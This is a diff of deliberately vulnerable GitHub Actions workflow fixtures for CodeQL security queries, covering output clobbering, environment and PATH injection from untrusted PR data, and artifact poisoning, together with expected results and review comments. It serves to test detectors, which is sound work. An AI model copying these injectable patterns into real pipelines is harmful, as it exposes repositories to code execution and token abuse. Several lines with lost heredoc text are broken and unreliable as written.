+ name: pr_number
+ - id: clob1
+ run: |
+ # VULNERABLE
+ echo "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT
+ echo "OUTPUT_2=$(> $GITHUB_OUTPUT
diff --git a/actions/ql/test/query-tests/Security/CWE-074/.github/workflows/output2.yml b/actions/ql/test/query-tests/Security/CWE-074/.github/workflows/output2.yml
new file mode 100644
index 000000000000..614de61b0cb7
--- /dev/null
+++ b/actions/ql/test/query-tests/Security/CWE-074/.github/workflows/output2.yml
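Review bot: `test3` triggers on `issue_comment:` but feeds `run_id: ${{ github.event.workflow_run.id }}` to the download step; that context path only exists for `workflow_run` events, so in a real run the download would receive an empty id. If the clobbering query treats the `dawidd6/action-download-artifact` step as an artifact source regardless of trigger, the test still passes, but adding `workflow_run:` alongside `issue_comment:` in the `on:` block keeps the fixture runnable as written. output2.yml pairs `issue_comment:` with `github.event.workflow_run.id` in its `test3` job in the same way.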
@@ -0,0 +1,62 @@ +on: + issue_comment: +jobs: + test1: + runs-on: ubuntu-latest + steps: + - id: clob1 + env: + BODY: ${{ github.event.comment.body }} + run: | + # VULNERABLE + echo $BODY + echo "::set-output name=OUTPUT::SAFE" + - id: clob2 + env: + BODY: ${{ github.event.comment.body }} + run: | + # VULNERABLE + echo "::set-output name=OUTPUT::SAFE" + echo $BODY + - id: clob3 + run: | + echo ${{ steps.clob1.outputs.OUTPUT }} + test2: + runs-on: ubuntu-latest + steps: + - id: clob1 + env: + BODY: ${{ github.event.comment.body }} + run: | + # NOT VULNERABLE + echo "::set-output name=OUTPUT::SAFE" + test3: + runs-on: ubuntu-latest + steps: + - name: Download artifact + uses: dawidd6/action-download-artifact@v6 + with: + run_id: ${{ github.event.workflow_run.id }} + name: pr_number + - id: clob1 + run: | + # VULNERABLE + PR="$(> $GITHUB_OUTPUT\necho "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT\n | provenance | Config | +| .github/workflows/output1.yml:30:9:35:6 | Uses Step | .github/workflows/output1.yml:36:14:39:58 | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$(> $GITHUB_OUTPUT\n | provenance | Config | +| .github/workflows/output2.yml:9:18:9:49 | github.event.comment.body | .github/workflows/output2.yml:10:14:13:48 | # VULNERABLE\necho $BODY\necho "::set-output name=OUTPUT::SAFE"\n | provenance | Config | +| .github/workflows/output2.yml:16:18:16:49 | github.event.comment.body | .github/workflows/output2.yml:17:14:20:21 | # VULNERABLE\necho "::set-output name=OUTPUT::SAFE"\necho $BODY\n | provenance | Config | +| .github/workflows/output2.yml:36:9:41:6 | Uses Step | .github/workflows/output2.yml:42:14:46:48 | # VULNERABLE\nPR="$(> $GITHUB_OUTPUT\necho "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT\n | semmle.label | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT\n | +| .github/workflows/output1.yml:30:9:35:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/output1.yml:36:14:39:58 | # 
VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$(> $GITHUB_OUTPUT\n | semmle.label | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$(> $GITHUB_OUTPUT\n | +| .github/workflows/output2.yml:9:18:9:49 | github.event.comment.body | semmle.label | github.event.comment.body | +| .github/workflows/output2.yml:10:14:13:48 | # VULNERABLE\necho $BODY\necho "::set-output name=OUTPUT::SAFE"\n | semmle.label | # VULNERABLE\necho $BODY\necho "::set-output name=OUTPUT::SAFE"\n | +| .github/workflows/output2.yml:16:18:16:49 | github.event.comment.body | semmle.label | github.event.comment.body | +| .github/workflows/output2.yml:17:14:20:21 | # VULNERABLE\necho "::set-output name=OUTPUT::SAFE"\necho $BODY\n | semmle.label | # VULNERABLE\necho "::set-output name=OUTPUT::SAFE"\necho $BODY\n | +| .github/workflows/output2.yml:36:9:41:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/output2.yml:42:14:46:48 | # VULNERABLE\nPR="$(> $GITHUB_OUTPUT\necho "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT\n | .github/workflows/output1.yml:9:18:9:49 | github.event.comment.body | .github/workflows/output1.yml:10:14:13:50 | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT\n | Potential clobbering of a step output in $@. | .github/workflows/output1.yml:10:14:13:50 | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT\n | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT\n | +| .github/workflows/output1.yml:36:14:39:58 | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$(> $GITHUB_OUTPUT\n | .github/workflows/output1.yml:30:9:35:6 | Uses Step | .github/workflows/output1.yml:36:14:39:58 | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$(> $GITHUB_OUTPUT\n | Potential clobbering of a step output in $@. 
| .github/workflows/output1.yml:36:14:39:58 | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$(> $GITHUB_OUTPUT\n | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$(> $GITHUB_OUTPUT\n | +| .github/workflows/output2.yml:10:14:13:48 | # VULNERABLE\necho $BODY\necho "::set-output name=OUTPUT::SAFE"\n | .github/workflows/output2.yml:9:18:9:49 | github.event.comment.body | .github/workflows/output2.yml:10:14:13:48 | # VULNERABLE\necho $BODY\necho "::set-output name=OUTPUT::SAFE"\n | Potential clobbering of a step output in $@. | .github/workflows/output2.yml:10:14:13:48 | # VULNERABLE\necho $BODY\necho "::set-output name=OUTPUT::SAFE"\n | # VULNERABLE\necho $BODY\necho "::set-output name=OUTPUT::SAFE"\n | +| .github/workflows/output2.yml:17:14:20:21 | # VULNERABLE\necho "::set-output name=OUTPUT::SAFE"\necho $BODY\n | .github/workflows/output2.yml:16:18:16:49 | github.event.comment.body | .github/workflows/output2.yml:17:14:20:21 | # VULNERABLE\necho "::set-output name=OUTPUT::SAFE"\necho $BODY\n | Potential clobbering of a step output in $@. | .github/workflows/output2.yml:17:14:20:21 | # VULNERABLE\necho "::set-output name=OUTPUT::SAFE"\necho $BODY\n | # VULNERABLE\necho "::set-output name=OUTPUT::SAFE"\necho $BODY\n | +| .github/workflows/output2.yml:42:14:46:48 | # VULNERABLE\nPR="$( { + return artifact.name == "artifacts" + })[0]; + let download = await github.rest.actions.downloadArtifact({ + owner: context.repo.owner, + repo: context.repo.repo, + artifact_id: matchArtifact.id, + archive_format: 'zip', + }); + let fs = require('fs'); + fs.writeFileSync(`/tmp/artifacts.zip`, Buffer.from(download.data)); + - run: | + mkdir -p /tmp/artifacts + unzip /tmp/artifacts.zip + shell: bash + - run: | + echo "Downloaded artifacts:" + ls -ablh + shell: bash 
diff --git a/actions/ql/test/query-tests/Security/CWE-077/.github/actions/download-artifact/action.yaml b/actions/ql/test/query-tests/Security/CWE-077/.github/actions/download-artifact/action.yaml
new file mode 100644
index 000000000000..0c2059521020
--- /dev/null
+++ b/actions/ql/test/query-tests/Security/CWE-077/.github/actions/download-artifact/action.yaml
@@ -0,0 +1,32 @@
+name: DownloadArtifacts
+description: 'Downloads and unarchives artifacts for a workflow that runs on workflow_run so that it can use its data'
+runs:
+ using: "composite"
+ steps:
+ - uses: actions/github-script@60a0d83039c74a4aee543508d2ffcb1c3799cdea # v7.0.1
+ with:
+ script: |
+ let allArtifacts = await github.rest.actions.listWorkflowRunArtifacts({
+ owner: context.repo.owner,
+ repo: context.repo.repo,
+ run_id: context.payload.workflow_run.id,
+ });
+ let matchArtifact = allArtifacts.data.artifacts.filter((artifact) => {
+ return artifact.name == "artifacts"
+ })[0];
+ let download = await github.rest.actions.downloadArtifact({
+ owner: context.repo.owner,
+ repo: context.repo.repo,
+ artifact_id: matchArtifact.id,
+ archive_format: 'zip',
+ });
+ let fs = require('fs');
+ fs.writeFileSync(`/tmp/artifacts.zip`, Buffer.from(download.data));
+ - run: |
+ mkdir -p /tmp/artifacts
+ unzip /tmp/artifacts.zip -d /tmp/artifacts
+ shell: bash
+ - run: |
+ echo "Downloaded artifacts:"
+ ls -ablh /tmp/artifacts
+ shell: bash
diff --git a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/artifactpoisoning51.yml b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/artifactpoisoning51.yml
new file mode 100644
index 000000000000..71f590fbc9c7
--- /dev/null
+++ b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/artifactpoisoning51.yml
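Review bot: `matchArtifact` is `undefined` whenever the triggering run has no artifact named `"artifacts"`, so `artifact_id: matchArtifact.id` a few lines below throws a bare TypeError instead of a failure that names the cause. A guard between the `filter(...)[0]` and the download call, `if (!matchArtifact) { throw new Error('no artifact named "artifacts" in run ' + context.payload.workflow_run.id); }`, fixes that. An identical script appears in a second download-artifact action earlier in this diff (its header is outside this view) with the same gap.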
@@ -0,0 +1,20 @@ +name: Pull Request Open + +on: + workflow_run: + workflows: ["Prev"] + types: + - completed + +jobs: + Download: + runs-on: ubuntu-latest + steps: + - run: | + gh run download "${{github.event.workflow_run.id}}" --repo "${GITHUB_REPOSITORY}" --name "artifact_name" + - name: Unzip + run: | + unzip artifact_name.zip -d foo + - name: Env Var Injection + run: | + echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV diff --git a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/artifactpoisoning52.yml b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/artifactpoisoning52.yml new file mode 100644 index 000000000000..e4845a6f2f16 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/artifactpoisoning52.yml @@ -0,0 +1,26 @@ +name: Pull Request Open + +on: + workflow_run: + workflows: ["Prev"] + types: + - completed + +jobs: + Download: + runs-on: ubuntu-latest + steps: + - run: | + gh run download "${{github.event.workflow_run.id}}" --repo "${GITHUB_REPOSITORY}" --name "artifact_name" + - name: Unzip + run: | + unzip artifact_name.zip -d foo + - name: Env Var Injection + run: | + echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}" + cat foo >> "$GITHUB_ENV" + echo "EOF" >> "${GITHUB_ENV}" + + + + diff --git a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/artifactpoisoning53.yml b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/artifactpoisoning53.yml new file mode 100644 index 000000000000..67209267b5c5 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/artifactpoisoning53.yml 
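Review bot: in `artifactpoisoning52.yml` the line `echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"` has unbalanced quotes and no heredoc delimiter, yet it is followed by `cat foo >> "$GITHUB_ENV"` and an `echo "EOF"` terminator, so it was presumably `echo "PACKAGES_FILE_LIST<<EOF" >> "${GITHUB_ENV}"` and the `<<EOF` was lost when the page was rendered. If the committed file really reads this way, the step is no longer the multi-line GITHUB_ENV write the `EOF` terminator implies and the expected result for this fixture should be re-checked. Both the 51 and 52 fixtures also pass `${{github.event.workflow_run.id}}` straight into `gh run download`; the run id is numeric so this is not injectable, but if the intent is to model the recommended pattern an `env:` variable would read better.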
@@ -0,0 +1,27 @@ +name: Pull Request Open + +on: + workflow_run: + workflows: ["Prev"] + types: + - completed + +jobs: + Download: + runs-on: ubuntu-latest + steps: + - run: | + gh run download "${{github.event.workflow_run.id}}" --repo "${GITHUB_REPOSITORY}" --name "artifact_name" + - name: Unzip + run: | + unzip artifact_name.zip -d foo + - run: | + { + echo 'JSON_RESPONSE<> "$GITHUB_ENV" + + + + diff --git a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/artifactpoisoning91.yml b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/artifactpoisoning91.yml new file mode 100644 index 000000000000..af9f01b572f1 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/artifactpoisoning91.yml @@ -0,0 +1,29 @@ +name: SnapshotPR +on: + workflow_run: + workflows: + - ApprovalComment + types: + - completed +jobs: + snapshot: + permissions: + id-token: write + pull-requests: write + statuses: write + if: github.event.workflow_run.conclusion == 'success' + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@9bb56186c3b09b4f86b1c65136769dd318469633 # v4.1.2 + - uses: ./.github/actions/download-artifact + - id: metadata + run: | + pr_number="$(head -n 2 /tmp/artifacts/metadata.txt | tail -n 1)" + pr_commit="$(tail -n 1 /tmp/artifacts/metadata.txt)" + echo PR_COMMIT="$pr_commit" >> "$GITHUB_ENV" + echo PR_NUMBER="$pr_number" >> "$GITHUB_ENV" + - uses: actions/checkout@9bb56186c3b09b4f86b1c65136769dd318469633 # v4.1.2 + with: + ref: ${{ env.PR_COMMIT }} + - uses: ./.github/actions/install-deps + - run: make snapshot diff --git a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/artifactpoisoning92.yml b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/artifactpoisoning92.yml new file mode 100644 index 000000000000..e35bc73c3bda --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/artifactpoisoning92.yml 
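Review bot: in `artifactpoisoning91.yml` the `metadata` step lets the untrusted artifact choose `PR_COMMIT`, which the next `actions/checkout` uses as `ref:` and `make snapshot` then executes under `id-token: write`, so the fixture models arbitrary code execution rather than only an env-file write; the `if: github.event.workflow_run.conclusion == 'success'` gate says nothing about where the artifact came from. Because `head -n 2 | tail -n 1` and `tail -n 1` each yield a single line — the shape test16 labels `NOT VULNERABLE` for EnvVarInjection — a comment on that step such as `# VULNERABLE: artifact content selects the checkout ref` would record which query is expected to flag it. The same note applies to `artifactpoisoning92.yml`, which differs only in the download action it calls.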
@@ -0,0 +1,29 @@ +name: SnapshotPR +on: + workflow_run: + workflows: + - ApprovalComment + types: + - completed +jobs: + snapshot: + permissions: + id-token: write + pull-requests: write + statuses: write + if: github.event.workflow_run.conclusion == 'success' + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@9bb56186c3b09b4f86b1c65136769dd318469633 # v4.1.2 + - uses: ./.github/actions/download-artifact-2 + - id: metadata + run: | + pr_number="$(head -n 2 /tmp/artifacts/metadata.txt | tail -n 1)" + pr_commit="$(tail -n 1 /tmp/artifacts/metadata.txt)" + echo PR_COMMIT="$pr_commit" >> "$GITHUB_ENV" + echo PR_NUMBER="$pr_number" >> "$GITHUB_ENV" + - uses: actions/checkout@9bb56186c3b09b4f86b1c65136769dd318469633 # v4.1.2 + with: + ref: ${{ env.PR_COMMIT }} + - uses: ./.github/actions/install-deps + - run: make snapshot diff --git a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/path1.yml b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/path1.yml new file mode 100644 index 000000000000..d22f09c03bdb --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/path1.yml @@ -0,0 +1,33 @@ +name: Pull Request Open + +on: + pull_request_target: + +jobs: + test: + runs-on: ubuntu-latest + steps: + + - run: echo "${{ github.event.pull_request.title }}" >> $GITHUB_PATH + - env: + PATHINJ: ${{ github.event.pull_request.title }} + run: echo $(echo "$PATHINJ") >> $GITHUB_PATH + - env: + PATHINJ: ${{ github.event.pull_request.title }} + run: echo $PATHINJ >> $GITHUB_PATH + - env: + PATHINJ: ${{ github.event.pull_request.title }} + run: echo ${PATHINJ} >> $GITHUB_PATH + - uses: dawidd6/action-download-artifact@v2 + with: + name: artifact_name + path: foo + - run: echo "$(cat foo/bar)" >> $GITHUB_PATH + - env: + ACTIONS_ALLOW_UNSECURE_COMMANDS: true + PATHINJ: ${{ github.event.pull_request.title }} + run: echo "::add-path::$PATHINJ" + + + + 
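Review bot: the first step of `path1.yml`, `echo "${{ github.event.pull_request.title }}" >> $GITHUB_PATH` at file line 11, is absent from the EnvPathInjectionCritical expected results (rows start at line 13/14), which matches test1's convention of treating direct expression interpolation as code injection rather than PATH injection — but unlike test1 nothing in the fixture says so. A step name such as `- name: Code Injection, do not report as PATH INJ` would stop a later reader from filing it as a false negative. `dawidd6/action-download-artifact@v2` is a mutable tag here while test16 pins a SHA; harmless for a fixture, but consistency helps when these files are copied as examples.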
diff --git a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test1.yml b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test1.yml new file mode 100644 index 000000000000..8ca103cbb6a1 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test1.yml @@ -0,0 +1,15 @@ +name: Test + +on: + pull_request_target: + +jobs: + test: + runs-on: ubuntu-latest + steps: + - name: Code Injection, do not report as ENV VAR INJ + run: echo ISSUE_KEY=$(echo "${{ github.event.pull_request.title }}") >> $GITHUB_ENV + - name: Code Injection, do not report as ENV VAR INJ + run: echo ISSUE_KEY=$(echo "${{ github.event.pull_request.head.ref }}") >> $GITHUB_ENV + + diff --git a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test10.yml b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test10.yml new file mode 100644 index 000000000000..f43a12cb42a3 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test10.yml @@ -0,0 +1,28 @@ +name: Build and Dockerize + +on: + pull_request_target: + +jobs: + build: + name: Test + runs-on: ubuntu-latest + steps: + - name: Decide Which 'ref' To Checkout + id: decide-ref + run: | + if [[ "${{github.event_name}}" == "pull_request_target" ]]; then + echo "ref=refs/pull/${{ github.event.pull_request.number }}/merge" >> $GITHUB_OUTPUT + else + echo "ref=${{github.ref}}" >> $GITHUB_OUTPUT + fi + + - name: Checkout + uses: actions/checkout@v4 + with: + ref: ${{steps.decide-ref.outputs.ref}} + path: "foo" + + - name: Read Java Config + run: cat foo/.github/java-config.env >> $GITHUB_ENV + diff --git a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test11.yml b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test11.yml new file mode 100644 index 000000000000..5edd526d8201 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test11.yml 
@@ -0,0 +1,28 @@ +name: Write prerelease comment + +on: + workflow_run: + workflows: ["Create Pull Request Prerelease"] + types: + - completed + +jobs: + comment: + if: ${{ github.repository_owner == 'foo' }} + runs-on: ubuntu-latest + name: Write comment to the PR + steps: + - name: "Download runtime versions" + uses: dawidd6/action-download-artifact@v2 + with: + run_id: ${{ github.event.workflow_run.id }} + name: runtime-versions.md + + - name: "Put runtime versions on the environment" + id: runtime_versions + run: | + { + echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV" diff --git a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test12.yml b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test12.yml new file mode 100644 index 000000000000..3a0c4cc91b82 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test12.yml 
@@ -0,0 +1,80 @@ +name: Write prerelease comment + +on: + workflow_run: + workflows: ["Create Pull Request Prerelease"] + types: + - completed + +jobs: + comment: + runs-on: ubuntu-latest + name: Write comment to the PR + steps: + - name: "Put PR and workflow ID on the environment" + uses: actions/github-script@v7 + with: + script: | + // Copied from .github/extract-pr-and-workflow-id.js + const allArtifacts = await github.rest.actions.listWorkflowRunArtifacts({ + owner: context.repo.owner, + repo: context.repo.repo, + run_id: context.payload.workflow_run.id, + }); + + for (const artifact of allArtifacts.data.artifacts) { + // Extract the PR number from the artifact name + const match = /^npm-package-(.+)-(\d+)$/.exec(artifact.name); + if (match) { + const packageName = match[1].toUpperCase(); + require("fs").appendFileSync( + process.env.GITHUB_ENV, + `\nWORKFLOW_RUN_PR_FOR_${packageName}=${match[2]}` + + `\nWORKFLOW_RUN_ID_FOR_${packageName}=${context.payload.workflow_run.id}` + ); + } + } + + - name: "Download runtime versions" + # Regular `actions/download-artifact` doesn't support downloading + # artifacts from another workflow + uses: dawidd6/action-download-artifact@v2 + with: + run_id: ${{ github.event.workflow_run.id }} + name: runtime-versions.md + + - name: "Put runtime versions on the environment" + id: runtime_versions + run: | + { + echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV" + + - name: "Download pre-release report" + uses: dawidd6/action-download-artifact@v2 + with: + run_id: ${{ github.event.workflow_run.id }} + name: prerelease-report.md + + - name: "Put pre-release report on the environment" + id: prerelease_report + run: | + { + echo 'PRERELEASE_REPORT<> "$GITHUB_ENV" + + - name: "Comment on PR with Wrangler link" + uses: marocchino/sticky-pull-request-comment@v2 + with: + number: ${{ env.WORKFLOW_RUN_PR_FOR_WRANGLER }} + message: | + ${{ env.PRERELEASE_REPORT }} + + --- + + ${{ env.RUNTIME_VERSIONS }} + 
diff --git a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test13.yml b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test13.yml new file mode 100644 index 000000000000..78d288fb9822 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test13.yml @@ -0,0 +1,23 @@ +name: publish +on: + pull_request_target: + branches: + - main +jobs: + need-publish: + permissions: + actions: write + name: Need Publish + runs-on: ubuntu-latest + steps: + - name: Checkout + uses: actions/checkout@v4 + with: + ref: ${{ github.event.pull_request.head.ref }} + - name: Get commit message + run: | + COMMIT_MESSAGE=$(git log --format=%s) + echo "COMMIT_MESSAGE=${COMMIT_MESSAGE}" >> $GITHUB_ENV + - name: Get commit message + run: | + echo "COMMIT_MESSAGE=$(git log --format=%s)" >> $GITHUB_ENV diff --git a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test14.yml b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test14.yml new file mode 100644 index 000000000000..93854c5e889f --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test14.yml @@ -0,0 +1,30 @@ +name: Pull Request Open + +on: + pull_request_target: + +jobs: + test1: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v2 + with: + ref: ${{ github.event.pull_request.head.sha }} + - id: changed-files + run: | + echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV" + - run: echo "${{ env.CHANGED-FILES }}" + test2: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v2 + with: + ref: ${{ github.event.pull_request.head.sha }} + - id: changed-files + run: | + FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/) + echo "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV" + - run: echo "${{ env.CHANGED-FILES }}" + + + 
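Review bot: in `test13.yml`, `git log --format=%s` without `-1` prints the subject of every commit reachable from the checked-out head, so `COMMIT_MESSAGE` is multi-line by construction and both `>> $GITHUB_ENV` writes are injectable before even considering attacker-chosen subjects; a `# VULNERABLE` comment on those steps would record that expectation. Separately, `ref: ${{ github.event.pull_request.head.ref }}` resolves the branch name in the base repository, so for a fork PR this checkout presumably fails unless `repository:` is also set — irrelevant to the static result, but `head.sha` as used in test14 keeps the fixture realistic.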
diff --git a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test15.yml b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test15.yml new file mode 100644 index 000000000000..89ecd8c0ec3e --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test15.yml @@ -0,0 +1,29 @@ +name: Pull Request Open + +on: + pull_request_target: + +jobs: + test1: + runs-on: ubuntu-latest + steps: + - id: title + run: | + echo "BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV" + - run: echo "$TITLE" + test2: + runs-on: ubuntu-latest + steps: + - id: title + run: | + PR_BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH}) + echo "BODY=$PR_BODY" >> "$GITHUB_ENV" + - run: echo "$TITLE" + test3: + runs-on: ubuntu-latest + steps: + - run: | + echo "branch_name=$(jq --raw-output .pull_request.head.ref $GITHUB_EVENT_PATH)" >> $GITHUB_ENV + + + diff --git a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test16.yml b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test16.yml new file mode 100644 index 000000000000..efcfda0e4c76 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test16.yml 
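Review bot: both consumer steps in `test15.yml` run `echo "$TITLE"`, but the preceding step exports `BODY`, never `TITLE`, so the source/consumer pairing is inconsistent; `- run: echo "$BODY"` (or exporting `TITLE=` instead) keeps the fixture self-consistent. The value of these three jobs is that the untrusted value comes from `jq --raw-output ... ${GITHUB_EVENT_PATH}` rather than a `${{ }}` expression, which is easy to overlook — a short `# source: PR body/branch read from the event payload via jq` comment would make that explicit.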
@@ -0,0 +1,35 @@ +name: Pull Request Open + +on: + workflow_run: + +jobs: + test1: + runs-on: ubuntu-latest + steps: + - name: Download PR metadata + uses: dawidd6/action-download-artifact@e6e25ac3a2b93187502a8be1ef9e9603afc34925 # v2.24.2 + with: + workflow: ${{ github.event.workflow_run.workflow_id }} + name: pr_metadata + - run: | + # VULNERABLE + echo "PR_NUMBER=$(cat pr_number.txt)" >> $GITHUB_ENV + - run: | + # VULNERABLE + echo "PR_NUMBER=$(cat pr_number.txt | tr ',' '\n')" >> $GITHUB_ENV + - run: | + # NOT VULNERABLE + echo "PR_NUMBER=$(cat pr_number.txt | tr '\n' ' ')" >> $GITHUB_ENV + - run: | + # NOT VULNERABLE + echo "PR_NUMBER=$(cat pr_number.txt | tr -d '\n')" >> $GITHUB_ENV + - run: | + # NOT VULNERABLE + echo "PR_NUMBER=$(cat pr_number.txt | tr -cd '[:alpha:]_')" >> $GITHUB_ENV + - run: | + # NOT VULNERABLE + echo "PR_NUMBER=$(cat pr_number.txt | tail -n 1)" >> $GITHUB_ENV + - run: | + # NOT VULNERABLE + echo "PR_NUMBER=$(cat pr_number.txt | head -n 1)" >> $GITHUB_ENV diff --git a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test17.yml b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test17.yml new file mode 100644 index 000000000000..dbf8c94b308f --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test17.yml 
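Review bot: the step using `tr -cd '[:alpha:]_'` deletes every digit, so for a value named `PR_NUMBER` it always yields an empty string; the `# NOT VULNERABLE` label is still correct (newlines cannot survive), but `tr -cd '[:alnum:]_'` would make the sanitizer look intentional rather than like a typo. The `# VULNERABLE` / `# NOT VULNERABLE` comments in this file are the clearest in the set and make the expected file reviewable; the same convention would help the other fixtures in this directory, most of which carry no marker at all.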
@@ -0,0 +1,36 @@ +on: + push: + branches: [main] + workflow_dispatch: + inputs: + pypi: + type: boolean + description: Publish + +jobs: + publish: + runs-on: ubuntu-latest + permissions: + id-token: write + steps: + - name: Checkout code + uses: actions/checkout@v4 + with: + token: ${{ secrets._GITHUB_TOKEN }} + - name: Extract PR Details + env: + GH_TOKEN: ${{ secrets._GITHUB_TOKEN }} + run: | + # Check if the event is a pull request or pull_request_target + if [ "${{ github.event_name }}" = "pull_request" ] || [ "${{ github.event_name }}" = "pull_request_target" ]; then + PR_NUMBER=${{ github.event.pull_request.number }} + PR_TITLE=$(gh pr view $PR_NUMBER --json title --jq '.title') + else + # Use gh to find the PR associated with the commit + COMMIT_SHA=${{ github.event.after }} + PR_JSON=$(gh pr list --search "${COMMIT_SHA}" --state merged --json number,title --jq '.[0]') + PR_NUMBER=$(echo $PR_JSON | jq -r '.number') + PR_TITLE=$(echo $PR_JSON | jq -r '.title') + fi + echo "PR_NUMBER=$PR_NUMBER" >> $GITHUB_ENV + echo "PR_TITLE=$PR_TITLE" >> $GITHUB_ENV diff --git a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test18.yml b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test18.yml new file mode 100644 index 000000000000..1c4b1e863122 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test18.yml 
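Review bot: the `pull_request`/`pull_request_target` branch of the `if` is unreachable, because the workflow only triggers on `push` and `workflow_dispatch`, so the path that actually runs is `gh pr list --search "${COMMIT_SHA}" ... | jq -r '.title'` into `PR_TITLE`; on `workflow_dispatch` the payload has no `after`, so `${{ github.event.after }}` is presumably empty and the search is unconstrained. If the intent is to model `gh` CLI output as an untrusted source, a comment on the `Extract PR Details` step saying so would make the expectation explicit, and the dead branch can go unless it is deliberately there to test trigger-sensitivity. `echo $PR_JSON` is also unquoted; `echo "$PR_JSON"` avoids word-splitting the JSON before `jq` sees it.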
